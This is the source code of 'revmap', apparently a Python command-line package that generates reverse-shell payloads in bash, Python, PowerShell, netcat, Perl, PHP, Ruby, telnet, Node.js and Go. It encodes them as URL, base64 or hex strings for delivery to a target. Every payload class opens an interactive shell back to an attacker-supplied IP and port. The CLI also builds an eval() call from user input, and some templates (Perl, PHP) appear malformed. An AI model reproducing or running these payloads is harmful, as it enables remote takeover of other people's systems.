from .encoded import Encode


class Bash(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = (
            f"bash -c 'exec bash -i &>/dev/tcp/{self.__ip}/{self.__porta} <&1'"
        )
        super().__init__(self.__payload)


class Python(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{self.__ip}",{self.__porta}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
        super().__init__(self.__payload)


class Powershell(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = (
            "$client = New-Object System.Net.Sockets.TCPClient('"
            + self.__ip
            + "',"
            + self.__porta
            + ");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
        )
        super().__init__(self.__payload)


class Netcat(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f'nc -vn {self.__ip} {self.__porta} -e "/bin/bash"'
        super().__init__(self.__payload)


class Perl(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = 'perl -e \'use Socket;$i="$ENV{'
        +self.__ip
        +'}"+";$p=$ENV{'
        +self.__porta
        +'};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
        super().__init__(self.__payload)


class PHP(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f'php -r \'$sock=fsockopen(getenv({self.__ip}),getenv({self.__porta}));exec("/bin/sh -i <&3 >&3 2>&3");\''
        super().__init__(self.__payload)


class Ruby(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f'ruby -rsocket -e\'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{self.__ip}",{self.__porta}))\''
        super().__init__(self.__payload)


class Telnet(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f'TF=$(mktemp -u);mkfifo $TF && telnet {self.__ip} {self.__porta} 0<$TF | sh 1>$TF'
        super().__init__(self.__payload)


class NodeJs(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = f"require('child_process').execSync('nc -e sh {self.__ip} {self.__porta}')"
        super().__init__(self.__payload)


class Golang(Encode):
    def __init__(self: object, ip: str, porta: str):
        self.__ip = ip
        self.__porta = porta
        self.__payload = (
            'echo \'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","'
            + self.__ip
            + ':'
            + self.__porta
            + '");cmd:=exec.Command("sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}\' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go'
        )
        super().__init__(self.__payload)



from urllib.parse import quote
from base64 import b64encode
import binascii


class Encode:
    def __init__(self, payload: str):
        self.__payload = payload

    def shell(self):
        return self.__payload

    def urlencode(self):
        return quote(self.__payload)

    def base64(self):
        messagebytes = bytes(self.__payload, 'utf-8')
        return b64encode(messagebytes)

    def hexadecimal(self):
        messagebytes = bytes(self.__payload, 'utf-8')
        return binascii.hexlify(messagebytes)



#!/usr/bin/python3
# -*- coding: UTF-8 -*-
from setuptools import setup, find_packages
import os

meta = {}
here = os.path.abspath(os.path.dirname(__file__))

with open(f'{here}/revmap/__meta__.py', encoding='utf-8') as arquivo:
    exec(arquivo.read(), meta)

with open('README.md', 'r', encoding='utf-8') as arq:
    readme = arq.read()

setup(
    name=meta['__title__'],
    version=meta['__version__'],
    license='MIT License',
    author=meta['__author__'],
    url=meta['__url__'],
    long_description=readme,
    long_description_content_type='text/markdown',
    author_email=meta['__author_email__'],
    keywords='revshell shell python security',
    description=meta['__description__'],
    packages=find_packages(),
    zip_safe=False,
    python_requires='>=3.6, <4',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.8',
        'Programming Language :: Python :: 3.9',
        'Programming Language :: Python :: 3.10',
        'Programming Language :: Python :: 3.11',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: Implementation :: PyPy',
        'Topic :: Security',
        'Topic :: System :: Networking',
        'Topic :: System :: Operating System',
        'Topic :: System :: Systems Administration',
        'Topic :: Utilities',
    ],
    entry_points={
        'console_scripts': [
            'revmap=revmap.revmap:argumentos',
        ]
    },
)



__version__ = '0.0.2'
__version_tuple__ = version_tuple = (0, 0, 2)
__title__ = 'revmap'
__description__ = (
    'Tool that generates reverse shell in multiple languages and encodes'
)
__url__ = 'https://github.com/joaoviictorti/revmap'
__author__ = 'joaoviictorti (viictorjj)'
__author_email__ = 'joaovictorti08@gmail.com'
__copyright__ = 'Copyright João Victor'



import argparse
from argparse import RawTextHelpFormatter
from .payloads import *


def banner():
    return """
 ___ ___ _ _ _____ ___ ___ 
|  _| -_| | |     | .'| . |
|_| |___|\_/|_|_|_|__,|  _|
                      |_|  
        v0.0.1 - @joaoviictorti                          
"""


def argumentos():
    global args
    parser = argparse.ArgumentParser(
        prog=banner(),
        usage='revmap --ip 192.168.4.80 --port 4444 --payload bash --encode urlencode',
        formatter_class=RawTextHelpFormatter,
    )
    parser.add_argument('--version', action='version', version='revmap 0.0.1')
    parser.add_argument(
        '--ip',
        type=str,
        dest='ip',
        action='store',
        help='Insert ip',
        required=True,
    )
    parser.add_argument(
        '--port',
        type=str,
        dest='porta',
        action='store',
        help='Insert port',
        required=True,
    )
    parser.add_argument(
        '--payload',
        type=str,
        dest='payload',
        action='store',
        choices=[
            'bash',
            'python',
            'powershell',
            'nc',
            'php',
            'perl',
            'ruby',
            'telnet',
            'nodejs',
            'golang',
        ],
        help='Insert payload',
        required=True,
    )
    parser.add_argument(
        '--encode',
        type=str,
        dest='encode',
        action='store',
        choices=['base64', 'hexadecimal', 'urlencode', 'shell'],
        help='Insert encode',
        required=True,
    )
    args = parser.parse_args()

    match args.payload:
        case 'bash':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Bash("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'python':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Python("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'powershell':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Powershell("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'nc':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Netcat("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'perl':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Perl("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'php':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'PHP("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'ruby':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Ruby("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'telnet':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Telnet("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'nodejs':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'NodeJs("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
        case 'golang':
            match args.encode:
                case 'urlencode' | 'hexadecimal' | 'base64' | 'shell':
                    print(
                        eval(
                            f'Golang ("{args.ip}","{args.porta}").{args.encode}()'
                        )
                    )
